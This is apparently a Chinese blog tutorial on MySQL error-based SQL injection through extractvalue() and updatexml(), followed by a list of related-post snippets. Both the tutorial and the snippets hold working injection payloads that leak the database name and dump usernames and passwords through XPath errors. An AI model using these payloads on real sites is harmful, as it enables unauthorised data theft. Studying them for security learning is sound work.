基于extractvalue()和updatexml()的报错注入

最新推荐文章于 2024-04-24 10:45:27 发布
最新推荐文章于 2024-04-24 10:45:27 发布
阅读量232 收藏
点赞数 1
分类专栏: web安全 文章标签: xml php 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38850916/article/details/120888005
版权

extractvalue()函数

EXTRACTVALUE (XML_document, XPath_string); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
第二个参数:XPath_string (Xpath格式的字符串). 
作用:从目标XML中返回包含所查询值的字符串

正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

例如

select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))

也可以使用concat()函数进行拼接

例如

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘/’,(select database() ) )))

当故意写入语法错误时

例如

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘~’,(select database()))))

可以看出,以~开头的内容不是xml格式的语法,报错,但是会显示无法识别的内容是什么,这样就达到了目的。

有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位

例如查询前五位

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5))))

updatexml()函数

UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据 
作用:改变文档中符合条件的节点的值

利用方法和上面的函数类似

select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))

Le叶a子f
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)
mooyuan的博客
11-27 1067
iwebsec靶场的SQL注入漏洞的第05关updatexml注入漏洞渗透。​通过源码再来分析下时间盲注关卡重点内容:(1)闭合方式是什么?iwebsec的第05关关卡为数字型注入,无闭合方式(2)注入类别是什么?这部分是报错型盲注(3)是否过滤了关键字?很明显通过源码,iwebsec的时间报错型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透。初学者还是应该以手动注入方法练习,真正了解原理后可以在使用sqlmap来提升速度。
SQL注入——基于报错的注入【extractvalue()】篇
2301_76437855的博客
03-31 248
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
报错注入学习
m0_63253040的博客
03-28 2238
复习完sqlilabs 1-4关 熟悉了简单sql注入的payload,不用反复看wp的payload,学到了可以 0x5c:/ %23:# %20: (空格) 0x7e=~ -1') union select 1,(select group_concat(username,0x5c,password) from users),3 %23 遇到第五关报错注入 学习文章1 学习文章2 学习笔记: 报错注入原理:报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出...
HardSQL报错注入
sGanYu
09-27 1229
使用fuzz测试,过滤很严重,包括=【用like代替】,空格【用()代替】,union【用or代替】等等都被过滤 使用堆注入查询,似乎不行,而且substr也被禁用,尝试使用报错注入 updatexmlextractvalue 构造查询数据库payload admin'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))# 构造查询表payload admin'or(updatexml(1,concat(0x7e,..
SQL注入 报错(updatexmlextractvalue函数介绍)
一米八多的瑞兹的博客
12-22 776
1. Sqlmap 更新参数介绍 –purge 以安全模式删除所有sqlmap数据目录。 2. 演示数据表介绍 3. updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_documentString格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_valueString
SQL 注入之报错及盲注及使用sqlmap 注入
weixin_52281518的博客
02-11 3723
报错注入 报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中 Updatexml() 函数用法:updatexml(XML_document,XPath_string,new_value); XML_documentString格式,为XML文档对象的名称,中文名为Doc XPath_string XPath格式的字符串 new_value String格式,替换查找到的符合条件的数据 我们通常在第二个xpath参数填写我们要查询的内容。 Up
Sqli-labs第十七关之UpdateXML
qq_39511050的博客
08-28 650
updatexml函数,xpath表达式
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 7239
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
SQL盲注之python脚本爆破及sqlmap基础操作
wangringyi的博客
04-09 6043
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本化盲注 sqlmap的使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
SQL注入 报错(updatexmlextractvalue函数介绍)-01
09-15
SQL注入 报错(updatexmlextractvalue函数介绍)-01
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入及延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
MySql读写Xml两种方式性能比较
06-21
MySql通过存储过程读写Xml两种方式性能比较。使用ExtractValue
jackalope-doctrine-dbal:Jackalope的学说DBAL传输实现
05-15
杰克洛普学说 ... Jackalope使用Doctrine DBAL来抽象数据库层。 目前已测试它可以与MySQL... MySQL> = 5.1.5(我们需要ExtractValue函数) PostgreSQL SQLite的 安装 推荐的安装jackalope的方法是通过 。 $ mkdir my-p
jackson.dataformat.xml 反序列化 对象中包含泛型
最新发布
正怒月神的博客
04-24 302
指定XML元素用于List或者Map ,默认值userWrapping=true。我的Model嵌套了一个泛型,我们重点关注Containers 这个对象。这个注解写在类上,用来忽略在xml中有的属性但是在类中没有的情况。localName 指定root的根路径的名称,默认值为类名。为了让Jackson认出泛型,从而可以顺利反序列化。Containers中,有一个泛型List<>localName 指定本地名称。我们使用如下两个注解。
hibernate5 根据xml获取ddl sql语句
孔的博客
04-23 300
【代码】hibernate5 根据xml获取ddl sql语句。
若依集成mybatisplus报错找不到xml
qq_36022463的博客
04-22 362
中可以知道,系统会自动配置SqlSessionFactory,,但是,当你有自定义的。所以需要,将SqlSessionFactory 换成,,,就会出问题,,,,
SpringBoot内容协商机制(就是接受数据的类型如json,xml
gaoqiandr的博客
04-23 410
本文主要介绍的是SpringBoot中的内容协商机制,也就是接收参数的数据格式,如xml,json等等
【sping】在logback-spring.xml 获取项目名称
一个写了10年bug的程序员日常笔记。
04-20 444
在日志文件中我们想根据spring.application.name 创建出的文件夹。也不想死在XML文件中。
extractvalue报错注入需要猜解字段吗
05-30
是的,使用 extractvalue 函数进行注入时,需要先猜解出目标数据库中的字段名和表名,才能进行注入。因为 extractvalue 函数需要指定要查询的字段名和表名,如果不知道这些信息,无法进行有效的注入。因此,常见的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值